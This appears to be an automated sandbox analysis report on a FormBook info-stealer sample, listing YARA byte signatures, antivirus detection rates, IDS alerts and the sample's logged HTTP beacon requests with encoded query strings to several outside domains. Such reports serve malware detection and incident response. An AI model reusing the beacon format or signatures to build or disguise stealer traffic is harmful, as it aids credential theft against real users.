5.2.RegAsm.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
4.2.NQQWym075C.exe.5fe0000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.NQQWym075C.exe.5fe0000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.NQQWym075C.exe.5fe0000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15879:$sqlite3step: 68 34 1C 7B E1 0x1598c:$sqlite3step: 68 34 1C 7B E1 0x158a8:$sqlite3text: 68 38 2A 90 C5 0x159cd:$sqlite3text: 68 38 2A 90 C5 0x158bb:$sqlite3blob: 68 53 D8 7F 8C 0x159e3:$sqlite3blob: 68 53 D8 7F 8C
4.2.NQQWym075C.exe.5fe0000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.NQQWym075C.exe.5fe0000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.NQQWym075C.exe.5fe0000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: NQQWym075C.exe	Virustotal: Detection: 30%			Perma Link
Source: NQQWym075C.exe	ReversingLabs: Detection: 48%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: NQQWym075C.exe

Joe Sandbox ML: detected

Source: 2.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then pop ebx	2_2_00406899
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then pop ebx	5_2_00406899
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop ebx	6_2_03246899
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop ebx	10_2_02966899

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49728
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49730
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49731
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 35.186.238.101:80 -> 192.168.2.3:49744
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49745

Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1Host: www.ussouthernhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.myreviewandbonuses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1Host: www.thrust-board.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1Host: www.not-taboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1Host: www.tnicholson.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.sabaicraft.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1Host: www.deadroommn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1Host: www.keitakora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 35.186.238.101 35.186.238.101
Source: Joe Sandbox View	IP Address: 198.49.23.141 198.49.23.141
Source: Joe Sandbox View	IP Address: 23.227.38.64 23.227.38.64

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK

Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1Host: www.ussouthernhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.myreviewandbonuses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1Host: www.thrust-board.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1Host: www.not-taboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1Host: www.tnicholson.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.sabaicraft.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1Host: www.deadroommn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1Host: www.keitakora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.ussouthernhome.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:14:52 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:03:34 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei

Source: explorer.exe, 00000003.00000000.252651061.0000000008907000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: wlanext.exe, 00000006.00000002.485637823.00000000034A5000.00000004.00000020.sdmp	String found in binary or memory: http://www.sz360buy.com/d
Source: wlanext.exe, 00000006.00000002.485456630.0000000003496000.00000004.00000020.sdmp	String found in binary or memory: http://www.sz360buy.com/o56q/?6l=2CtK5nvmO
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000006.00000002.489818929.0000000003DA2000.00000004.00000001.sdmp	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
